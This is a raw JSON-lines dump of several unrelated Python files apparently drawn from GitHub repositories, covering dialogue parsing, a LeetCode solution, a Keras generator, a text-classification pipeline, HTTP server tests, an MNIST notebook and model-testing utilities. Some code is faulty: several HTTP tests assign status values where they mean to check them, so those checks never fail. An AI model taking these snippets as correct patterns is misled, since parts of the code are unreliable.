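# above (parse a JSON file on first access, cache it afterwards). The file path
# is a placeholder; functools.cached_property is the modern one-line equivalent.
import json

class LazyData:
    def __init__(self, path):
        self._path = path
        self._data = None          # not loaded yet

    @property
    def data(self):
        if self._data is None:     # first access: read and cache
            with open(self._path, "r") as fh:
                self._data = json.load(fh)
        return self._data          # later accesses: return the cached object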
intent_list.append(l)\n bahasa_domain_intent[d] = intent_list\n all_domain_intent = {'multiwoz': fil_domain, 'bahasawoz': bahasa_domain_intent}\n with open(os.path.join('./', 'en_ba_domain_intent.json'), 'w', encoding='utf8') as fd:\n json.dump(all_domain_intent, fd)\n\n\n\nif __name__ == '__main__':\n parser = MultiWOZParser(directory='../../MULTIWOZ2.1')\n parser.get_action_sentences()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"luckyRookies/bahasa_data_processing","sub_path":"action_parser_mul.py","file_name":"action_parser_mul.py","file_ext":"py","file_size_in_byte":6752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72921022176","text":"class Solution:\n\tdef removeElement(self, nums, val):\n\t\t\"\"\"\n\t\t:type nums: List[int]\n\t\t:type val: int\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tcount = 0\n\t\tfor i, value in enumerate(nums):\n\t\t\tprint(nums)\n\t\t\tif value == val:\n\t\t\t\tnums[i] = -1\n\t\twhile -1 in nums:\n\t\t\tnums.remove(-1)\n\t\t\tprint(nums)\n\t\treturn len(nums)\n\n\n\t\t\t\t\n","repo_name":"BhavanaRamakrishna/Leetcode","sub_path":"Remove Element.py","file_name":"Remove Element.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7811166257","text":"\r\n# Lista variabili globali \r\n\r\nimport json\r\n\r\ndef globalInitialization():\r\n global alive, listaStazioni, nTotStazioni, listaAGV#, listaGui\r\n alive = True\r\n\r\n nTotStazioni = [8,3,2]\r\n listaStazioni = [None]*3\r\n for j in range(3):\r\n listaStazioni[j] = [True]*(nTotStazioni[j]+1)\r\n \r\n \r\n listaAGV = []\r\n nListe = 3\r\n for i in range(nListe):\r\n l = []\r\n listaAGV.append(l)\r\n\r\n \r\n","repo_name":"MattPero96/manifattura_P3","sub_path":"ServerMQTT3_0TEST/gvServer.py","file_name":"gvServer.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28595795622","text":"food_in_kg = float(input())\nhay_in_kg = float(input())\ncover_in_kg = float(input())\nweight_in_kg = float(input())\n\nfood_gr = food_in_kg * 1000\nhay_gr = hay_in_kg * 1000\ncover_gr = cover_in_kg * 1000\nweight_gr = weight_in_kg * 1000\n\ndays = 1\ngo_to_store = False\n\nwhile True:\n if days == 31:\n break\n food_gr -= 300\n if days % 2 == 0:\n hay_gr -= (5 / 100) * food_gr\n if days % 3 == 0:\n cover_gr -= (1 / 3) * weight_gr\n if food_gr <= 0 or hay_gr <= 0 or cover_gr <= 0:\n go_to_store = True\n break\n days += 1\n\nif go_to_store:\n print(f\"Merry must go to the pet store!\")\nelse:\n print(f\"Everything is fine! Puppy is happy! Food: {(food_gr / 1000):.2f}, Hay: {(hay_gr / 1000):.2f}, Cover: {(cover_gr / 1000):.2f}.\")","repo_name":"rayapetkova/SoftUni_Python","sub_path":"2. Python Fundamentals/MID EXAMS/04. 
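# An alternative sketch for the remove-element problem above: the usual
# two-pointer approach is O(n) and, unlike the -1 sentinel used in
# Remove Element.py, it still works when the array legitimately contains -1.
def remove_element(nums, val):
    write = 0
    for x in nums:
        if x != val:
            nums[write] = x   # keep x by compacting it toward the front
            write += 1
    return write              # the first `write` slots hold the kept values

nums = [3, 2, 2, 3]
k = remove_element(nums, 3)
print(k, nums[:k])            # 2 [2, 2]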
Programming Fundamentals Mid Exam/01_guinea_pig.py","file_name":"01_guinea_pig.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"34"} +{"seq_id":"35744002434","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Reshape\nfrom keras.layers.core import Activation\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import UpSampling2D\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.core import Flatten\nfrom keras.optimizers import Adam\nfrom keras.utils import np_utils\nfrom keras import backend as K\nimport numpy as np\nimport sys\nimport glob\nfrom PIL import Image\nimport os\nimport argparse\n\nsys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),\n '../deep-learning-models'))\nimport vgg16\n\nNUM_BATCH = 5\n\n\ndef generator_model():\n model = Sequential()\n model.add(Dense(input_dim=100, output_dim=256 * 256 * 3))\n model.add(BatchNormalization(mode=2))\n model.add(Activation('relu'))\n model.add(Reshape((256, 256, 3)))\n model.add(UpSampling2D(size=(2, 2)))\n model.add(Convolution2D(512, 5, 5, border_mode='same'))\n model.add(BatchNormalization(mode=2))\n model.add(Activation('relu'))\n model.add(UpSampling2D(size=(2, 2)))\n model.add(Convolution2D(256, 5, 5, border_mode='same'))\n model.add(BatchNormalization(mode=2))\n model.add(Activation('relu'))\n model.add(UpSampling2D(size=(2, 2)))\n model.add(Convolution2D(128, 5, 5, border_mode='same'))\n model.add(BatchNormalization(mode=2))\n model.add(Activation('relu'))\n model.add(UpSampling2D(size=(2, 2)))\n model.add(Convolution2D(3, 5, 5, border_mode='same'))\n model.add(Activation('tanh'))\n return model\n\n\ndef generator_with_classifier(generator, classifier):\n model = Sequential()\n model.add(generator)\n classifier.trainable = False\n model.add(classifier)\n\n return model\n\n\ndef generate(filepath, output_dir, BATCH_SIZE):\n generator = generator_model()\n adam = Adam(lr=0.0002, beta_1=0.5, beta_2=0.999, epsilon=1e-08)\n generator.compile(loss='categorical_crossentropy', optimizer=adam)\n generator.load_weights(filepath)\n\n noise = np.zeros((BATCH_SIZE, 100))\n for i in range(BATCH_SIZE):\n noise[i, :] = np.random.uniform(-1, 1, 100)\n\n print('Generating images..')\n generated_images = [np.rollaxis(img, 0, 3)\n for img in generator.predict(noise)]\n\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n for index, img in enumerate(generated_images):\n img = img * 127.5\n img = img.astype(np.uint8)\n img = Image.fromarray(img)\n img.save(os.path.join(output_dir, \"{0}.jpg\".format(index)))\n\n\ndef train(target_class, BATCH_SIZE):\n\n generator = generator_model()\n classifier = vgg16.VGG16(include_top=True, weights='imagenet')\n classifier_on_generator = generator_with_classifier(\n generator=generator, classifier=classifier)\n\n adam = Adam(lr=0.0002, beta_1=0.5, beta_2=0.999, epsilon=1e-08)\n generator.compile(loss='categorical_crossentropy', optimizer=adam)\n classifier_on_generator.compile(\n loss='categorical_crossentropy', optimizer=adam)\n\n for epoch in range(NUM_BATCH):\n noise = np.zeros((BATCH_SIZE, 100))\n for i in range(BATCH_SIZE):\n noise[i, :] = np.random.uniform(-1, 1, 100)\n\n y = np_utils.to_categorical([target_class] * BATCH_SIZE, 1000)\n\n g_loss = classifier_on_generator.train_on_batch(noise, y)\n print(\"Generator loss: 
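# The 30-day supply loop in 01_guinea_pig.py above mixes unit conversion,
# consumption rules and the verdict in one block; a parameterised sketch of the
# same simulation, with all quantities kept in grams throughout:
def supplies_last(food_kg, hay_kg, cover_kg, weight_kg, days=30):
    food, hay, cover = food_kg * 1000, hay_kg * 1000, cover_kg * 1000
    weight = weight_kg * 1000
    for day in range(1, days + 1):
        food -= 300
        if day % 2 == 0:
            hay -= 0.05 * food        # 5% of the *remaining* food, as above
        if day % 3 == 0:
            cover -= weight / 3
        if food <= 0 or hay <= 0 or cover <= 0:
            return False
    return True

print(supplies_last(10, 5, 5.2, 1))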
\", g_loss)\n\n if epoch == NUM_BATCH - 1:\n print('saving weights...')\n filename = \"{0}_generator.h5\".format(target_class)\n generator.save_weights(filename, True)\n\n generate(filename, target_class, 10)\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--target_class\", type=int, required=True)\n parser.add_argument(\"--batch_size\", type=int, default=100)\n parser.add_argument(\"--mode\", type=str, default=\"train\")\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = get_args()\n if args.mode not in (\"train\", \"generate\"):\n raise ValueError(\"mode must be 'train' or 'generate'\")\n train(args.target_class, args.batch_size)\n","repo_name":"RyotaKatoh/keras-CNN-cheater","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30547385115","text":"from gensim.models import word2vec\nimport numpy as np\nimport re\nimport os\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras.utils import to_categorical\nimport sklearn.utils\nfrom sklearn.model_selection import train_test_split\nfrom ThreadsafeIter import threadsafe_generator\nfrom StoreFiles import StoreFiles\nimport pandas as pd\nimport gensim\nimport keras\nfrom keras.preprocessing.text import Tokenizer\nimport pickle\nfrom Constantes_public import model_files_folder\n\nfrom Log import logger\n\n\nclass TeamPipeline:\n def __init__(self):\n pass\n\n # Remove labels that are not enough represented\n @staticmethod\n def drop_unrepresented_labels(df, label_col, percentage_drop=0.1):\n categories_counts = pd.value_counts(df[label_col])\n reduced_categories_counts = categories_counts[(categories_counts / categories_counts.sum())*100.\n > percentage_drop]\n percentage_keep = reduced_categories_counts.sum() / categories_counts.sum() * 100\n logger.info(\"We keep {:.2f} % of the data and {} labels\".format(percentage_keep,\n len(reduced_categories_counts)))\n result = df[df[label_col].isin(reduced_categories_counts.index)]\n result = result.reset_index(drop=True)\n return result\n\n # Method only to remove Capital letters and split the text by every non letter\n @staticmethod\n def split_and_lower(text):\n cleaned_sentence = []\n words = re.split(\"\\W\", text)\n for word in words:\n if word != '':\n if not word.isupper():\n word = word.lower()\n cleaned_sentence.append(word)\n return cleaned_sentence\n\n # apply Word2vec Model by gensim\n def get_word2vec_model(self, text_serie, **kwargs):\n sf = StoreFiles('model')\n fname = sf.get_fname(type=\"word2vec\", **kwargs)\n if fname is not None:\n model = word2vec.Word2Vec.load(os.path.join(model_files_folder, fname))\n\n else:\n logger.debug('training word2vec ...')\n sentences = []\n sentences.extend(text_serie.fillna('').apply(self.split_and_lower))\n import time\n t1 = time.time()\n model = word2vec.Word2Vec(sentences, **kwargs)\n # size=100, window=5, min_count=100, workers=8, hs=1, sg=1, iter=5)\n logger.info('time running word2vec model : {}'.format(time.time() - t1))\n # if save_model:\n fname = sf.fname_and_store(type=\"word2vec\", **kwargs)\n model.save(os.path.join(model_files_folder, fname))\n return model, fname\n\n # method which allows to use an embedding layer directly in the model\n def get_tokenizer(self, text_serie, **kwargs):\n sf = StoreFiles('model')\n fname = sf.get_fname(type=\"tokenizer\", 
**kwargs)\n if fname is not None:\n try:\n tokenizer = pickle.load(open(fname, 'rb'))\n except FileNotFoundError as e:\n logger.error(\"trying to reload the file\")\n tokenizer = pickle.load(open(fname, 'rb'))\n\n else:\n logger.info('Tokenizer ... ')\n model_filename = sf.fname_and_store(type=\"tokenizer\", **kwargs)\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(text_serie)\n pickle.dump(tokenizer, open(os.path.join(model_files_folder, model_filename), 'wb'))\n logger.info('Tokenized')\n\n return tokenizer, fname\n\n # Transform text to word embeddings to use it in the model\n def sentence_to_word2vec_embedding(self, word2vec_model, sentence):\n result = []\n if type(sentence) is float:\n return result\n sent_split = sentence.split()\n for word in sent_split:\n try:\n result.append(word2vec_model.wv.word_vec(word))\n except KeyError:\n continue\n # if len(result) == 0:\n # result.append(np.zeros(word2vec_model.layer1_size))\n return result\n\n # encode label, for example if we have 8 teams, and we want to change the team 2 (2) -> becomes (0,0,1,0,0,0,0,0)\n def encode_label(self, labels, categorical=True):\n label_encoder = LabelEncoder()\n labels = label_encoder.fit_transform(labels)\n if categorical:\n labels = to_categorical(labels)\n return labels, label_encoder\n\n # allow to separate in validation and training set\n def train_valid_split(self, X, y, test_size=0.2, shuffle=True):\n assert len(X) == len(y), 'X and y in train valid split must have same length'\n if shuffle:\n X_train, X_valid, y_train, y_valid = train_test_split(X, y, test_size=test_size)\n else:\n if test_size > 1:\n idx = test_size\n else:\n idx = int(len(X) * (1 - test_size))\n X_train, X_valid = X[:idx], X[idx:]\n y_train, y_valid = y[:idx], y[idx:]\n logger.info(\"length train: {} and length valid: {}\".format(len(X_train), len(X_valid)))\n return (X_train, y_train), (X_valid, y_valid)\n\n # take text input data in a dataframe, return batches of vectors\n @threadsafe_generator\n def data_to_batch_generator(self, X, y=None, shuffle=False, embedding_model=None, batch_size=32, len_padding=100):\n while True:\n if shuffle:\n if y is not None:\n X, y = sklearn.utils.shuffle(X, y)\n else:\n raise Exception(\"if you shuffle X without y you will not be able to get the order for y\")\n\n for i in range(0, len(X), batch_size):\n batch = X[i:(i + batch_size)]\n\n if batch_size > len(X):\n raise RuntimeError(\"Impossible to compute a batch size greater than the size of data\")\n # TODO: find a way to include last the last batch which has a different size\n # if (i + batch_size) > len(X):\n # logger.warn(\"Taking random rows to complete last batch\")\n # idx = np.random.randint(len(X), size=(i+batch_size) - len(X))\n # batch = pd.concat([X[i:(i + batch_size)], X[idx]], axis=0)\n\n if type(embedding_model) is gensim.models.word2vec.Word2Vec:\n batch = np.array(batch.apply(lambda sent: self.sentence_to_word2vec_embedding(embedding_model, sent)))\n elif type(embedding_model) is keras.preprocessing.text.Tokenizer:\n if batch_size == 1:\n raise NotImplementedError(\"If you do not use word2vec, take a batch size greater than 1\")\n batch = embedding_model.texts_to_sequences(batch)\n else:\n # Todo find a way to add new embedding models\n raise NotImplementedError('Need to implement behavior when no embedding or other embedings')\n pass\n if len_padding is not None:\n batch = pad_sequences(batch, maxlen=len_padding, dtype=np.float32,\n padding='pre', truncating='post')\n\n if y is not None:\n batch_labels = y[i:(i + 
batch_size)]\n yield batch, batch_labels\n else:\n yield batch\n\n\nif __name__ == '__main__':\n for W2V in [True, False]:\n df = pd.DataFrame([['bonjour je avoir un problème ici', \"team1\"],\n ['nous aller le réosudre de ici là', \"team2\"],\n [\"nous vouloir améliorer\", \"team1\"],\n [\"je être maintenant devant un problème\", \"team3\"]], columns=[\"Text\", \"Team\"])\n print(df)\n X = df.Text\n y = df.Team\n tp = TeamPipeline()\n y, encoder = tp.encode_label(y, categorical=True)\n (X_train, y_train), (X_valid, y_valid) = tp.train_valid_split(X, y)\n\n if W2V:\n embedding_model, fname_embedding = tp.get_word2vec_model(X_train, size=3, window=2,\n min_count=0)\n else:\n embedding_model, fname_embedding = tp.get_tokenizer(X_train)\n\n gen = tp.data_to_batch_generator(X_train, y_train, shuffle=True, embedding_model=embedding_model,\n batch_size=32, len_padding=10)\n\n for i in gen:\n print(i)\n print(i[0].shape)\n break\n","repo_name":"turpaultn/Text_classification","sub_path":"Code/Pipeline.py","file_name":"Pipeline.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21019502085","text":"import os\nimport subprocess\nimport socket\nimport time\nimport httplib\nimport json\nfrom . import start_process_server, start_data_server, stop_server\n\ntest_vars = {}\n\ndef setup():\n# (po, fo_out, fo_err) = start_data_server()\n# test_vars['data_po'] = po\n# test_vars['data_fo_out'] = fo_out\n# test_vars['data_fo_err'] = fo_err\n (po, fo_out, fo_err) = start_process_server()\n test_vars['process_po'] = po\n test_vars['process_fo_out'] = fo_out\n test_vars['process_fo_err'] = fo_err\n return\n\ndef teardown():\n# stop_server(test_vars['data_po'], \n# test_vars['data_fo_out'], \n# test_vars['data_fo_err'])\n stop_server(test_vars['process_po'], \n test_vars['process_fo_out'], \n test_vars['process_fo_err'])\n return\n\nclass BaseProcessTest:\n\n \"\"\"base class for process tests\"\"\"\n\n n_data_connections = 0\n n_process_connections = 0\n\n def setUp(self):\n \"\"\"set up each test\"\"\"\n self.data_connections = []\n self.process_connections = []\n self.next_data_connection = 0\n self.next_process_connection = 0\n for i in xrange(self.n_data_connections):\n c = httplib.HTTPConnection('localhost', 8080)\n self.data_connections.append(c)\n for i in xrange(self.n_process_connections):\n c = httplib.HTTPConnection('localhost', 8081)\n self.process_connections.append(c)\n return\n\n def tearDown(self):\n \"\"\"clean up after each test\"\"\"\n for i in xrange(self.n_data_connections):\n self.data_connections[i].close()\n for i in xrange(self.n_process_connections):\n self.process_connections[i].close()\n return\n\n def data_request(self, *args):\n hc = self.data_connections[self.next_data_connection]\n self.next_data_connection += 1\n hc.request(*args)\n return hc.getresponse()\n\n def process_request(self, *args):\n hc = self.process_connections[self.next_process_connection]\n self.next_process_connection += 1\n hc.request(*args)\n return hc.getresponse()\n\nclass TestGetRoot(BaseProcessTest):\n\n n_process_connections = 3\n\n def test(self):\n r = self.process_request('GET', '/')\n r.status = 200\n r.reason = 'OK'\n assert ' wc' in r.read()\n return\n\n def test_accept(self):\n r = self.process_request('GET', '/', '', {'Accept': 'application/json'})\n r.status = 200\n r.reason = 'OK'\n data = r.read()\n try:\n obj = json.loads(data)\n except:\n self.fail('returned data was not json')\n assert 
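# A numpy-only sketch of the batching-plus-padding idea behind
# TeamPipeline.data_to_batch_generator above: slice fixed-size batches off a
# list of variable-length sequences and left-pad ("pre") / right-truncate
# ("post") them to a common length, without depending on Keras.
import numpy as np

def batches(seqs, batch_size=2, maxlen=4):
    for i in range(0, len(seqs), batch_size):
        batch = seqs[i:i + batch_size]
        out = np.zeros((len(batch), maxlen), dtype=np.float32)
        for j, s in enumerate(batch):
            s = s[:maxlen]                 # truncating='post'
            out[j, maxlen - len(s):] = s   # padding='pre'
        yield out

for b in batches([[1, 2], [3, 4, 5, 6, 7], [8]]):
    print(b)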
isinstance(obj, dict)\n assert 'wc' in obj\n return\n\n def test_accept_bad(self):\n r = self.process_request('GET', '/', '', {'Accept': 'ctmaj/ctmin'})\n r.status = 406\n r.reason = 'Not Acceptable'\n assert r.read() == ''\n return\n\nclass Test404(BaseProcessTest):\n\n n_process_connections = 1\n\n def test(self):\n r = self.process_request('GET', '/thisshouldnotexist')\n r.status = 404\n r.reason = 'Not Found'\n return\n\nclass TestPostGetDelete(BaseProcessTest):\n\n n_process_connections = 4\n\n def test(self):\n\n headers = {'Content-Type': 'text/plain'}\n r = self.process_request('POST', '/echo', 'data', headers)\n assert r.status == 201\n assert r.reason == 'Created'\n headers = dict(r.getheaders())\n assert 'content-length' in headers\n assert headers['content-length'] == '0'\n assert 'location' in headers\n ident = headers['location'].split('/')[-1]\n assert r.read() == ''\n\n r = self.process_request('GET', '/job/%s' % ident)\n assert r.status == 200\n assert r.reason == 'OK'\n headers = dict(r.getheaders())\n assert 'content-length' in headers\n try:\n content_length = int(headers['content-length'])\n except ValueError:\n self.fail('content-length is not an integer')\n assert len(r.read()) == content_length\n\n r = self.process_request('DELETE', '/job/%s' % ident)\n assert r.status == 204\n assert r.reason == 'No Content'\n assert r.read() == ''\n\n r = self.process_request('GET', '/job/%s' % ident)\n assert r.status == 410\n assert r.reason == 'Gone'\n headers = dict(r.getheaders())\n assert 'content-length' in headers\n try:\n content_length = int(headers['content-length'])\n except ValueError:\n self.fail('content-length is not an integer')\n assert content_length == 0\n assert r.read() == ''\n\n return\n\nclass TestValidator(BaseProcessTest):\n\n \"\"\"test that a handler's validation presents correctly on the front end\"\"\"\n\n n_process_connections = 3\n\n def test_okay(self):\n headers = {'Content-Type': 'text/plain'}\n data = 'http://localhost:8081/'\n r = self.process_request('POST', '/wc', data, headers)\n assert r.status == 201\n assert r.reason == 'Created'\n return\n\n def test_bad_content_type(self):\n headers = {'Content-Type': 'application/json'}\n data = 'http://localhost:8081/'\n r = self.process_request('POST', '/wc', data, headers)\n assert r.status == 415\n assert r.reason == 'Unsupported Media Type'\n return\n\n def test_bad_request(self):\n headers = {'Content-Type': 'text/plain'}\n r = self.process_request('POST', '/wc', 'bogus', headers)\n assert r.status == 400\n assert r.reason == 'Bad Request'\n return\n\n# eof\n","repo_name":"chaselgrove/dpf","sub_path":"tests/test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33996000082","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# 查看当前挂载的数据集目录, 该目录下的变更重启环境后会自动还原\n# View dataset directory. \n# This directory will be recovered automatically after resetting environment. \nget_ipython().system('ls /home/aistudio/data')\n\n\n# In[ ]:\n\n\n# 查看工作区文件, 该目录下的变更将会持久保存. 请及时清理不必要的文件, 避免加载过慢.\n# View personal work directory. \n# All changes under this directory will be kept even after reset. \n# Please clean unnecessary files in time to speed up environment loading. 
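# The test harness above is Python 2 (httplib, xrange). A hedged Python 3
# sketch of the same request/response pattern using the stdlib http.client;
# the host and port are the ones the tests assume, and nothing is actually
# listening here, so this is illustrative only.
import http.client

def process_request(method, path, body="", headers=None):
    conn = http.client.HTTPConnection("localhost", 8081)
    conn.request(method, path, body, headers or {})
    resp = conn.getresponse()     # exposes .status, .reason, .read()
    data = resp.read()
    conn.close()
    return resp.status, resp.reason, data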
\nget_ipython().system('ls /home/aistudio/work')\n\n\n# In[ ]:\n\n\n# 如果需要进行持久化安装, 需要使用持久化路径, 如下方代码示例:\n# If a persistence installation is required, \n# you need to use the persistence path as the following: \nget_ipython().system('mkdir /home/aistudio/external-libraries')\nget_ipython().system('pip install beautifulsoup4 -t /home/aistudio/external-libraries')\n\n\n# In[ ]:\n\n\n# 同时添加如下代码, 这样每次环境(kernel)启动的时候只要运行下方代码即可: \n# Also add the following code, \n# so that every time the environment (kernel) starts, \n# just run the following code: \nimport sys \nsys.path.append('/home/aistudio/external-libraries')\n\n\n# # 解压数据集\n\n# In[ ]:\n\n\nget_ipython().system('unzip -oq /home/aistudio/data/data35499/minist数据集.zip')\n\n\n# In[ ]:\n\n\nimport paddle\nimport numpy as np\nfrom PIL import Image\nimport os\nfrom matplotlib import pyplot as plt \n\n\n# In[ ]:\n\n\nroot = \"train_labs_black_background.txt\"\nf1 = open(root)\nlabels = f1.readlines()\nlabel = {}\nfor i in range(55000-1):\n label[str(int(labels[i][0:-2]))] = int(labels[i][-2])\nlabel[\"54999\"] = 8\n\n\n# In[ ]:\n\n\n# 预览图像\ntrain_image_files = os.listdir(\"train_black_background\")\nprint(train_image_files[6])\nimg = Image.open(\"train_black_background\"+\"/\"+train_image_files[6])\nprint(img) # 1*28*28\nplt.imshow(img)\n\n\n# In[ ]:\n\n\n# 构建网络\nclass Net(paddle.nn.Layer):\n def __init__(self):\n super(Net, self).__init__()\n self.fc1 = paddle.nn.Linear(in_features=1*28*28, out_features=128)\n self.fc2 = paddle.nn.Linear(in_features=128, out_features=10)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n# 实例化\nnet = Net()\n# 定义损失函数\nloss_func = paddle.nn.CrossEntropyLoss()\n# 定义优化器\nopt = paddle.optimizer.SGD(parameters=net.parameters())\n\ntrain_white_image_files = os.listdir(\"train_white_background\")\ntrain_black_image_files = os.listdir(\"train_black_background\")\ntrain_image_files = train_white_image_files+train_black_image_files\nprint(train_black_image_files[10:20])\n\n\n# 模型结构为全连接\n# \n# 学习率lr_schedule为0.001\n# \n# optimize为随机梯度下降优化器\n# \n# epoch为10\n# \n# \n# batch_size为1\n# \n# Loss function为交叉熵\n# \n\n# In[7]:\n\n\n#组件训练程序\nfor epoch in range(10):\n for img_id in range(len(train_black_image_files)):\n img_name = f\"{img_id}.png\"\n _img = Image.open(\"train_black_background\"+\"/\"+img_name)\n _img = np.array(_img).astype(\"float32\").flatten() / 255\n _img = paddle.to_tensor([_img], dtype=\"float32\")\n _label = label[str(img_id)]\n _label = paddle.to_tensor([_label], dtype=\"int64\")\n\n number_prob = net(_img)\n loss = loss_func(number_prob, _label)\n loss.backward()\n opt.step()\n opt.clear_gradients()\n print(f\"Epoch: {epoch}\\t loss: {loss.numpy()}\")\n\n#保存模型\npaddle.save(net.state_dict(), \"param\")\n\n\n# # 可视化模型效果\n\n# In[9]:\n\n\n# 可视化模型效果\nnet.set_dict(paddle.load(\"param\"))\n_img = Image.open(\"test_black_background\"+\"/\"+\"240.png\")\nplt.imshow(_img)\n_img = np.array(_img).astype(\"float32\").flatten() / 255\n_img = paddle.to_tensor([_img], dtype=\"float32\")\ninfer_number = net(_img)\nprint(\"240.png的预测结果为\",paddle.nn.functional.softmax(infer_number).numpy()) # 使用激活函数使概率分布与0到1之间\nprint(\"最大概率为\",np.argmax(infer_number.numpy()[0]))\n\n","repo_name":"lyf666tujc/-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"39461520695","text":"\"\"\"\nUtilities for test functions\n\nThis code assumes that the namespace that python based tests 
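# The label parsing in the notebook above slices fixed character positions
# (line[0:-2] / line[-2]), which silently breaks on trailing whitespace or
# multi-digit labels. A sketch of the same mapping built with split(),
# assuming each line is "<image_id> <label>" -- the exact file layout is an
# assumption, not taken from the original.
def load_labels(path):
    labels = {}
    with open(path) as fh:
        for line in fh:
            parts = line.split()
            if len(parts) == 2:
                image_id, label = parts
                labels[image_id] = int(label)
    return labels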
are in is correctly assigned, otherwise global\nvariables won't be present and this will throw errors\n\n\"\"\"\nfrom __future__ import print_function, absolute_import, division\nimport time\nimport contextlib\nimport sys\nfrom gsmodutils.utils import StringIO\n\n\nclass ModelTestSelector(object):\n \n def __init__(self, models=None, conditions=None, designs=None):\n \"\"\"\n For each parameter set run the test function with these models and save results accordingly\n \n This approach allows the reuse of test functions with multiple conditions/design parameters\n \n This \n \n Default functionality, when using the decorator, is to perfom the test on all models and under default\n conditions.\n \n Designs and conditions will never be loaded unless specified\n \n Without this decorator, the test function would run once\n \n usage as a decorator:\n\n from gsmodutils.testutitls import ModelTestSelector\n @ModelTestSelector(models=['model2'], conditions=['condtion_a'], designs=['a'])\n def test_func(model, project, log):\n log.assert(True, \"Works\", \"Does not work\". \"Test\")\n \"\"\"\n\n if models is None:\n models = []\n\n if conditions is None:\n conditions = []\n\n if designs is None:\n designs = []\n\n self.models = models\n self.conditions = conditions\n self.designs = designs\n\n def __call__(self, func):\n \"\"\"\n Repeatedly calls function with modfied parameters\n requires functions to have the standard form of arguments\n \"\"\"\n func._is_test_selector = True\n func.models = self.models\n func.conditions = self.conditions\n func.designs = self.designs\n \n return func\n\n\nclass ResultRecord(object):\n \"\"\"\n Class for handling logging of errors in tester\n follows a hierarchical pattern as log records allow child records\n This is a bit of a weird data structure but the objective is to (in a future version) encapsulate all tests inside\n an instance of Test Record\n \"\"\"\n def __init__(self, tid='', parent=None, param_child=False):\n self.id = tid\n self.parent = parent\n self.success = []\n self.error = []\n self.warnings = []\n self.std_out = None # Reserved for messages\n self.run_time = time.time()\n self.children = {}\n # tells us if this is a parameter varaiation of parent (i.e. as low a level as the logs should get)\n self.param_child = param_child\n \n def assertion(self, statement, success_msg, error_msg, desc=''):\n \"\"\"\n Called within test functions to store errors and successes\n Results will be appended to the correct log reccords\n \"\"\"\n desc = dict(\n desc=desc,\n ex_time=time.time()\n )\n if statement:\n self.success.append((success_msg, desc))\n else:\n self.error.append((error_msg, desc))\n\n def warning(self, statement, message, desc=''):\n \"\"\"\n Called within test functions to capture warnings about the status of models.\n If statement is true, the warning message will be stored.\n \"\"\"\n if statement:\n self.warnings.append((message, desc))\n \n def add_error(self, msg, desc=''):\n \"\"\"\n For errors loading tests, e.g. 
success cases can't be reached because the model doesn't load or can't get a\n feasable solution\n \"\"\"\n desc = dict(\n desc=desc,\n ex_time=time.time()\n )\n self.error.append((msg, desc))\n \n def create_child(self, new_id, param_child=False):\n \"\"\"\n Used within decorator helper functions to allow multiple tests with the same function but where other parameters\n change\n \"\"\"\n if self.param_child:\n raise TypeError('Parameter variations should not have child logs')\n \n newlog = ResultRecord(new_id, parent=self, param_child=param_child)\n self.children[new_id] = newlog\n return newlog\n \n @property\n def is_success(self):\n \"\"\"\n The test function is considered a failure if there are one or more error logs\n \"\"\"\n if len([x for x in self.children.values() if not x.is_success]) + len(self.error):\n return False\n return True\n\n @property\n def log_count(self):\n \"\"\" count total errors for self and children \"\"\"\n total = len(self.success) + len(self.error)\n error = len(self.error)\n \n for child in self.children.values():\n ct, ce = child.log_count\n error += ce\n total += ct\n \n return total, error\n\n def to_dict(self, stk=None):\n \"\"\"\n converts log into dictionary form for portability\n stk stops cyclic behaviour\n \"\"\"\n if stk is None:\n stk = []\n\n children = {}\n for child in self.children.values():\n if child.id not in stk:\n children[str(child.id)] = child.to_dict(stk=stk + [self.id])\n \n result = dict(\n id=str(self.id),\n children=children,\n error=self.error,\n success=self.success,\n is_success=self.is_success,\n run_time=self.run_time,\n )\n return result\n\n\n@contextlib.contextmanager\ndef stdout_ctx(stdout=None):\n \"\"\"\n Context to capture standard output of python executed tests during run time\n This is displayed to the user for them to see after the tests are run\n \"\"\"\n old = sys.stdout\n if stdout is None:\n stdout = StringIO()\n sys.stdout = stdout\n yield stdout\n sys.stdout = old\n\n\nclass ModelLoader(object):\n\n def __init__(self, project, model_id, conditions_id, design_id):\n \"\"\"\n Simple callback interface to load a model\n :param project: gsmodutils project\n :param model_id: model id within project\n :param conditions_id: mcondtions id within project\n :param design_id: design id within project\n \"\"\"\n self.project = project\n self.model_id = model_id\n self.conditions_id = conditions_id\n 